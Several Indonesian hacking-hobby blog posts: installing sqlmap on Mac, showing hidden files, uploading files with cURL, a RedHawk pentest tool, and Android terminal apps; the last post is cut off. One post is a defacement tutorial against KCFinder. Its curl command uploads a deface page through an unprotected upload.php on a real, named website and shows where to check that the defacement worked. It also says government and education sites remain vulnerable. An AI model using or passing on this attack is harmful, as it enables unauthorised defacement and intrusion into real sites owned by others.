Cara Install SQLMAP di Mac dengan HomeBrew - SQLMAP adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL Injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
Tools ini cukup populer dikalangan peretas mulai dari pemain baru dan pemain lama karena selain mudah dipakai tools ini juga sangat mudah didapatkan oleh karena itu tools ini merupakan tools favorit bagi para peretas hehehe.
Sebelum melakukan instalasi sqlmap silahkan cek terlebih dahulu apakah sqlmap sudah terinstall pada macbook anda atau belum, ketik "brew info sqlmap" jika ada tulisan "Not Installed" seperti gambar dibawah berarti tandanya belum terinstall jika belum.... langsung aja ikuti langkah dibawah.
 |
| Brew Info SQLMAP |
Langkah :
- ketik "brew install sqlmap" (tunggu sampai proses instalasi selesai).
- jika sudah selesai jalankan toolsnya, dengan cara ketik "sqlmap".
 |
| SQLMAP INSTALLED |
Nah sekian saja tutorial kali ini semoga bermanfaat, saya tidak bertanggung jawab atas apa yang kalian lakukan dengan tools ini, gunakan sebaik-baiknya, jangan lupa share artikel ini dan terus kunjungi blog ini thanks.
Dua Cara Memunculkan File Tersembunyi di Mac OS X - Setiap pengguna Mac pasti sudah tau bagaimana jadinya jika memiliki file yang berawal titik (.) seperti .bash_profile atau .viminfo pastinya file seperti itu tidak bisa dilihat secara langsung dan ini bukan hanya terjadi pada file saja bahkan folder pun akan tidak kelihatan jika nama filenya berawal titik.
Secara default, Finder dalam OS X menyembunyikan beberapa file jauh dari pandangan (kebanyakan yang tidak relevan) namun jika kamu ingin melihat semuanya pada komputermu, langsung saja coba Cara dibawah.
Disini saya akan memberikan
Dua Cara Memunculkan File Tersembunyi di Mac OS X yaitu dengan Terminal, yaps langsung aja cara pertama dibawah.
Sebelum mencoba dua cara dibawah silahkan buka Terminal dahulu, lewat Spotlight Search. lalu ketik terminal dan enter.
*terminal saya sudah percantik tampilannya.
- Cara Pertama : Melakukan Perintah ls -a di Terminal
- Pertama tentukan dulu folder mana yang akan mau dilihat, disini sebagai contoh saya ingin lihat file tersembunyi di Desktop karna ini hanya sebagai contoh jadi terserah anda mau tes di folder manapun.
- Ketik "cd Desktop", perintah cd gunanya untuk membuka directory.
- Jika sudah masuk ke Desktop langsung saja ketik "ls -a".
- Nahhh sudah berhasill! muncul file .DS_Store, .htaccess dan .localized.
- Cara Kedua : Bisa melihat file tersembunyi di finder.
- Ketik "defaults write com.apple.finder AppleShowAllFiles TRUE" di terminal.
Cek Desktop lewat Finder.
Nahh berhasil!
untuk mengembalikan supaya tersembunyi TRUE diganti FALSE.
Sekian saja yang saya dapat sampaikan semoga bermanfaat, jangan lupa untuk terus kunjungin blog ini :)
Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.
KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.
cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.
Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.
Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,
Bahan :
- Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
- Terminal / CMD
Tested :
- Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
- lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
- Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.
Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
Naufal Ardhani - CURL adalah alat yang hebat untuk membuat permintaan ke server bagi kalian yang males untuk menggunakan CSRF ( Cross-site request forgery ), Saya rasa ini sangat bagus untuk digunakan untuk menguji API.
Untuk mengunggah file dengan CURL, banyak orang membuat kesalahan yang berpikir untuk menggunakan -X POST sebagai data formulir biasa; dalam fakta, dengan cara itu akan menyebabkan kesalahan.
Lalu bagaimana cara yang tepat? Cara yang tepat untuk mengupload/mengunggah file dengan CURL adalah menggunakan opsi -F (- form), yang akan menambahkan enctype = "multipart / form-data" ke permintaan.
- naufal.txt hanya sebagai contoh file yang anda ingin upload.
$ curl -F ‘data=@path/to/local/file' UPLOAD_ADDRESS
Sebagai Contoh, jika saya ingin mengunggah file di /Users/naufalardhani/Desktop/naufal.txt ke server http://localhost/ upload yang memproses input file dengan parameter bentuk bernama img_avatar, saya akan membuat permintaan seperti ini,
$ curl -F 'img_avatar=@/home/naufalardhani/Desktop/naufal.txt' http://localhost/upload.php
Upload banyak file Untuk mengirim permintaan unggah untuk banyak file, cukup tambahkan opsi -F tambahan,
$ curl -F 'fileX=@/home/naufalardhani/Desktop/naufal.txt' -F 'fileY=@ /home/naufalardhani/Desktop/naufal.txt' ... http://localhost /upload.php
Unggah susunan file Untuk mengirim permintaan unggah array file, cukup tambahkan opsi -F tambahan dengan nama parameter bentuk yang sama dengan array,
$ curl -F 'file[]=@/home/naufalardhani/Desktop/naufal.txt' -F 'file []=@/path/ke/fileY' ... http://localhost/upload.php
Terima Kasih sudah menyempatkan waktu untuk membaca artikel saya, bila ada yang tidak dipahami silahkan komentar dibawah ya dengan disqus mudah kok caranya :)
Download RedHawk Version 2.0.0 for [ Tools ] [ CLI ] - Oke di post kali ini saya membagikan Tools CLI ( Command Line Interface ) yang bernama
RedHawk.
RedHawk adalah sebuah Tools untuk melakukan Pentest ( Penetration Tester ) situs, tools ini di buat oleh Tuhinshubhra, di dalam tools ini kalian bisa mendapatkan informasi dan celah suatu situs.
Fitur :
- Whois Lookup
- Geo-IP Lookup
- Grab Banners
- DNS Lookup
- Subnet Calculator
- NMAP Port Scan
- Subdomain Scanner
- Reverse IP Lookup & CMS Detection
- SQLi Scanner (Finds Links With Parameter And Scans For Error Based SQLi)
- Bloggers View (Information That Bloggers Might Be Interested In)
- WordPress Scan (Only If The Target Site Runs On WP)
- Crawler
- MX Lookup
Link Download :
Tested : Terminal Mac
Naufal Ardhani - Terminal merupakan suatu aplikasi yang sangat berguna bagi para hacker untuk menjalankan sebuah tools atau apa lah :v. Terminal ini terdapat pada PC dan ANDROID, sudah banyak Developer Developer yang mengembangkan Terminal untuk Android jadi para programmer atau heker heker tidak repot lagi untuk mencari terminal gratis.
1.Termux
Termux adalah Terminal Emulator khusus Android yang bisa menjalankan hampir semua pemrograman seperti Python, Php, Ruby dan lain lain pokoknya aplikasinya hampir mirip mirip terminal linux deh, Apps ini dikembangkan oleh Fredrik Fornwall. aplikasi ini bisa dijalankan untuk Android 5.0 keatas kalau dibawah android 5.0 ya ga bisa di download.
2.GNURoot Debian
Seperti yang anda ketahui, bahwa operasi sistem Android terbuat dari kernel Linux . Terlepas dari itu, kenyataan bahwa Android dan GNU/Linux yang didukung oleh kernel yang sama, dua sistem operasi ini sangat berbeda dan menjalankan sepenuhnya berbagai jenis program.
Terkadang aplikasi yang teredia di android agak mengecewakan dan aksesnya terbatas, terutama bila dibandingkan dengan OS yang lainnya. Untungnya, Anda bisa mendapatkan lingkungan GNU/Linux dan berjalan pada perangkat Android, Root atau non-root.
Untuk pengguna pada tablet Android, atau lainnya perangkat Android yangmemiliki layar besar (atau dapat plug ke layar yang lebih besar), kemampuan untuk menjalankan desktop perangkat lunak Linux dapat lebih jauh menuju peningkatan potensi untuk produktivitas.
3.Linux Deploy